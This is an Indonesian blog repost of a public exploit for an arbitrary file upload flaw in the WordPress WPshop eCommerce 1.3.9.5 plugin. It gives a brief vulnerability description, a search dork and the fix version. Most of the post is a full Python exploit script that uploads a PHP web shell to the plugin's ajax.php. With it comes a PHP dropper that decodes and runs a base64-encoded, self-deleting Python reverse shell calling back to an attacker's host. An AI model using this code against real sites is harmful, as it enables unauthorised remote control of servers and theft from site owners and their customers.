Flash Go
» » » » WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Arbitrary, Artikel Python, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload
link : WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

Baca juga


WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload


#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload
#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk
#-Date: 2015-03-02
#-Link Download : wordpress. org/plugins/wpshop/
#-Google Dork: inurl:wp-content/themes/wpshop/
#-Tested on : Linux
#-Fixed in : 1.3.9.6
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

CVSS Score : 6.4
CSSS Vector : CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : Blank

Description : 
The script ‘includes/ajax.php’ allows execution of various actions by anonymous users. The action name is provided in the ‘elementCode’ parameter. One of these actions is named ‘ajaxUpload’. This function allows for upload of arbitrary files, due to lack of sanitation of user input.


Solution:

Update to version 1.3.9.6.

-- Proof Of Concept --

require : Python (file.py)
How To use :
Python Name-script.py http://web. com back_python (your-ip) 1337
- Example :
Python wpshop.py http://web. com back_python.php 192.168.2.116 1337

Script wpshop.py : 
#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
    print """\x1b[1;32m
██╗    ██╗██████╗ ███████╗██╗  ██╗ ██████╗ ██████╗ ██╗    ██╗███╗   ██╗
██║    ██║██╔══██╗██╔════╝██║  ██║██╔═████╗██╔══██╗██║    ██║████╗  ██║
██║ █╗ ██║██████╔╝███████╗███████║██║██╔██║██████╔╝██║ █╗ ██║██╔██╗ ██║
██║███╗██║██╔═══╝ ╚════██║██╔══██║████╔╝██║██╔═══╝ ██║███╗██║██║╚██╗██║
╚███╔███╔╝██║     ███████║██║  ██║╚██████╔╝██║     ╚███╔███╔╝██║ ╚████║
 ╚══╝╚══╝ ╚═╝     ╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝
 Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
    f = open(php, "r").read()
    f = f.replace("<?php", "")
    f = f.replace("?>", "")
    encoded = f.encode('base64')
    encoded = encoded.replace("\n", "")
    encoded = encoded.strip()
    code = "eval(base64_decode('%s'));" %(encoded)
    return code

def shell_upload(url):
    target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    try:
        print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)    
        r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        return r.text.strip()
    else:
        sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
    cookies = {'host': cb_host, 'port': cb_port}
    data = {'woot': payload}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
    try:
        print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
        r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        print r.text

def pop_shell(target, code, cb_host, cb_port):
    shell_url = shell_upload(url=target)    
    print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
    try:
        print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
        spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
    banner()
    if len(args) != 5:
        sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
    pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
    main(args=sys.argv)

Script back_python.php : 

<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell = 
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>


Result Shell : Here !!


Demikianlah Artikel WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

Sekianlah artikel WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload dengan alamat link https://minatoet.blogspot.com/2015/12/wordpress-wpshop-ecommerce-1395.html

0 Response to "WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload"

Post a Comment

Subscribe to: Post Comments (Atom)